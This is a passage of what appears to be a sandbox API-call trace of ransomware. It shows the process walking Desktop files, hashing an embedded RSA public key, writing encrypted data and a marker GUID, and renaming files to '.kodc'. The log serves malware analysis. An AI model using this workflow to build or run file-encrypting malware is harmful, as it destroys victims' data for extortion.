lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xc7a5, lpOverlapped=0x0) returned 1 [0097.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0097.928] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc7aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.928] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0097.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0097.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0097.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0097.929] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0097.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.929] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.929] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.929] CloseHandle (hObject=0x5cc) returned 1 [0097.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0097.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.931] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vmGq grnpAL6-WzZ7.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vmgq grnpal6-wzz7.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vmGq grnpAL6-WzZ7.doc.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vmgq grnpal6-wzz7.doc.kodc")) returned 1 [0097.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0097.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.932] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0097.934] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ac34c0, ftCreationTime.dwHighDateTime=0x1d5bd01, ftLastAccessTime.dwLowDateTime=0xa216d560, ftLastAccessTime.dwHighDateTime=0x1d5bdea, ftLastWriteTime.dwLowDateTime=0xa216d560, ftLastWriteTime.dwHighDateTime=0x1d5bdea, nFileSizeHigh=0x0, nFileSizeLow=0x16973, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yEaSLdjQoLZPDOJC3jK.bmp", cAlternateFileName="YEASLD~1.BMP")) returned 1 [0097.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0097.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.934] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yEaSLdjQoLZPDOJC3jK.bmp") returned=".bmp" [0097.934] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yEaSLdjQoLZPDOJC3jK.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yeasldjqolzpdojc3jk.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.934] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=92531) returned 1 [0097.934] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.938] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1694d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.938] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.939] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.939] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x16973, lpOverlapped=0x0) returned 1 [0097.940] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.940] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.940] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.940] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.941] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.941] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.941] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.941] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.941] GetLastError () returned 0x0 [0097.941] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.941] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.941] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.941] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.941] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16970) returned 0x9ba4d90 [0097.942] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340260 [0097.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a778 [0097.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x33402a8 [0097.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a790 [0097.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7c0 [0097.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7d8 [0097.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.943] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0097.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7c0 | out: hHeap=0x630000) returned 1 [0097.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7d8 | out: hHeap=0x630000) returned 1 [0097.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0097.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a7d8 [0097.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0097.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a7c0 [0097.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0097.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0097.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0097.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0097.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7d8 | out: hHeap=0x630000) returned 1 [0097.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7c0 | out: hHeap=0x630000) returned 1 [0097.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.944] GetCurrentThreadId () returned 0x42c [0097.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x696698 [0097.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.945] GetCurrentThreadId () returned 0x42c [0097.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7c0 [0097.947] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0097.947] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7d8 [0097.947] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.947] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.948] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16973, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.948] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.948] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.949] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.949] CloseHandle (hObject=0x5cc) returned 1 [0097.950] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yEaSLdjQoLZPDOJC3jK.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yeasldjqolzpdojc3jk.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yEaSLdjQoLZPDOJC3jK.bmp.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yeasldjqolzpdojc3jk.bmp.kodc")) returned 1 [0097.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0097.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.952] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0097.953] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x832ef110, ftCreationTime.dwHighDateTime=0x1d5c14a, ftLastAccessTime.dwLowDateTime=0x4161b80, ftLastAccessTime.dwHighDateTime=0x1d5c32d, ftLastWriteTime.dwLowDateTime=0x4161b80, ftLastWriteTime.dwHighDateTime=0x1d5c32d, nFileSizeHigh=0x0, nFileSizeLow=0x108e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZO d wwM-wRdscY.bmp", cAlternateFileName="ZODWWM~1.BMP")) returned 1 [0097.953] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZO d wwM-wRdscY.bmp") returned=".bmp" [0097.954] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZO d wwM-wRdscY.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zo d wwm-wrdscy.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.954] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=4238) returned 1 [0097.954] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.958] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1068, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.958] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.959] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x108e, lpOverlapped=0x0) returned 1 [0097.959] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.960] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.960] lstrlenA (lpString="-----BEGIN PUBLIC 